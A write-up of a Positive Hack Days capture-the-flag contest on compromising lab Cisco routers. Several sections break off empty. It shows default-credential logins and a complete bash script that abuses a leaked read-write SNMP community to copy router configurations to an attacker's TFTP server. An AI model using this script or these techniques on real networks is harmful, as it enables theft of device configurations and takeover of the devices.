During the Positive Hack Days III forum, the NetHack contest for network security experts was held. The participants had 50 minutes to gain access to five network devices and capture the flags stored on them. The game network contained typical network infrastructure vulnerabilities that Positive Technologies experts had discovered during security assessments and penetration tests. Today we would like to bring to your attention a detailed review of the contest tasks.
To add a special appeal to the contest, the game infrastructure was prepared according to a legend. Here it is.
An equipment failure has occurred at a large hydroelectric power station, cutting the connection between the central Industrial Control System (ICS) and the water discharge units. Ongoing heavy rain in the surrounding area has significantly increased the inflow into the reservoir. Specialists estimate that the reservoir will overflow in fifty minutes, and the water will pour over the dam and flood the city. To prevent the disaster, one must gain access to the five faulty units and reconnect them to the central ICS so that the emergency sluices can be opened.
The contest layout
The game infrastructure was built according to the following layout:
The participants had to gain access to five network devices, find the MD5 flags left in their configurations and enter them into a form on a special web page. The participant who found and entered all five flags was awarded first prize.
Obtaining the first flag
Getting into R1 is easy: we just log in with the account 'cisco' and the password 'cisco'. We get the first flag at once:
Obtaining the second flag
The second flag requires a bit more skill. The first thing to do once we are inside a device is to look through its configuration and at the neighboring devices on the network (on Cisco IOS, show running-config and show cdp neighbors detail).
Obtaining the third flag
If we try to log in to Router3 with the account cisco/cisco, it does not work. Let's try to find the account we need. Taking another look at the Router2 configuration, we now notice the following line:
Obtaining the fourth flag
This is the most difficult part. We enable CDP on the Fa0/1 interface and check the neighboring devices:
Then we try to log in to Router4 and find out that RADIUS authentication is used. We take a closer look at the Router3 configuration and find a read-write SNMP community string, 'PHDays2013'. After changing the routing, we can try to pull the Router4 configuration over SNMP.
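The write-up does not show how the configuration was actually pulled, so here is an added example (not the contest authors' code) of the standard way to do it with a read-write community: write a row into ccCopyTable of CISCO-CONFIG-COPY-MIB with net-snmp's snmpset, which makes the router itself copy its running-config to a TFTP server, then poll ccCopyState and destroy the row. The router pushes the file, so the TFTP server must be reachable from the router. The target address 10.0.0.4, the TFTP server 10.0.0.100, the file name router4.cfg and the row index 4242 are assumptions for illustration; only the community string PHDays2013 comes from the write-up.

```bash
#!/usr/bin/env bash
# Added example: fetch a Cisco IOS running-config over SNMP with a read-write
# community via CISCO-CONFIG-COPY-MIB (ccCopyTable, 1.3.6.1.4.1.9.9.96.1.1.1).
# Server address, file name and row index below are assumed values.
set -u

CC_COPY_ENTRY="1.3.6.1.4.1.9.9.96.1.1.1.1"

# Columns of ccCopyEntry
COL_PROTOCOL=2      # ccCopyProtocol: 1 = tftp
COL_SRC_TYPE=3      # ccCopySourceFileType: 4 = runningConfig, 3 = startupConfig
COL_DST_TYPE=4      # ccCopyDestFileType: 1 = networkFile
COL_SERVER=5        # ccCopyServerAddress (IpAddress)
COL_FILENAME=6      # ccCopyFileName
COL_STATE=10        # ccCopyState: 1 waiting, 2 running, 3 successful, 4 failed
COL_ROWSTATUS=14    # ccCopyEntryRowStatus: 4 = createAndGo, 6 = destroy

# Print the "oid type value" varbinds that create a copy row meaning
# "copy running-config tftp://SERVER/FILE". Args: row-index server file [source-type]
copy_varbinds() {
  local idx="$1" server="$2" file="$3" src="${4:-4}"
  printf '%s.%s.%s i 1\n'  "$CC_COPY_ENTRY" "$COL_PROTOCOL"  "$idx"
  printf '%s.%s.%s i %s\n' "$CC_COPY_ENTRY" "$COL_SRC_TYPE"  "$idx" "$src"
  printf '%s.%s.%s i 1\n'  "$CC_COPY_ENTRY" "$COL_DST_TYPE"  "$idx"
  printf '%s.%s.%s a %s\n' "$CC_COPY_ENTRY" "$COL_SERVER"    "$idx" "$server"
  printf '%s.%s.%s s %s\n' "$CC_COPY_ENTRY" "$COL_FILENAME"  "$idx" "$file"
  printf '%s.%s.%s i 4\n'  "$CC_COPY_ENTRY" "$COL_ROWSTATUS" "$idx"
}

# Map a ccCopyState integer to its name.
copy_state_name() {
  case "$1" in
    1) echo waiting ;;
    2) echo running ;;
    3) echo successful ;;
    4) echo failed ;;
    *) echo "unknown($1)" ;;
  esac
}

# Drive the copy against a live device. Needs net-snmp (snmpset/snmpget) and a
# TFTP server at $server that the router can reach. Returns 0 on success.
pull_config() {
  local target="$1" community="$2" server="$3" file="$4" idx="${5:-4242}"
  # shellcheck disable=SC2046
  snmpset -v2c -c "$community" "$target" \
    $(copy_varbinds "$idx" "$server" "$file" | tr '\n' ' ') || return 1
  local i state=1
  for i in 1 2 3 4 5 6 7 8 9 10; do
    state=$(snmpget -v2c -c "$community" -Oqv "$target" "$CC_COPY_ENTRY.$COL_STATE.$idx")
    case "$(copy_state_name "$state")" in
      successful) break ;;
      failed) echo "copy failed on $target" >&2; break ;;
    esac
    sleep 1
  done
  # Always destroy the row so the table does not fill up with stale entries.
  snmpset -v2c -c "$community" "$target" \
    "$CC_COPY_ENTRY.$COL_ROWSTATUS.$idx" i 6 >/dev/null
  [ "$(copy_state_name "$state")" = successful ]
}

# Usage against the assumed lab addresses (not executed here):
#   pull_config 10.0.0.4 PHDays2013 10.0.0.100 router4.cfg
```

Pass 3 as the optional fourth argument of copy_varbinds to fetch the startup-config instead. The same row trick works in reverse (networkFile as source, runningConfig as destination), which is why a read-write community leaked in one router's configuration is effectively full administrative access to every device that shares it.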
Obtaining the last flag